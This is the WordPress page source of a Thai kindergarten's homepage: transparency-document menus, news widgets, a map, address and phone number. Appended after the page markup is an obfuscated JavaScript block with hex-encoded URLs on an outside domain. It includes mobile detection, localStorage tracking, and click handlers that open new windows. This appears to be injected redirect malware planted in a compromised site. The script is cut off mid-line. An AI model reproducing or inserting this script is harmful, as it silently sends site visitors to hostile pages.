900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( 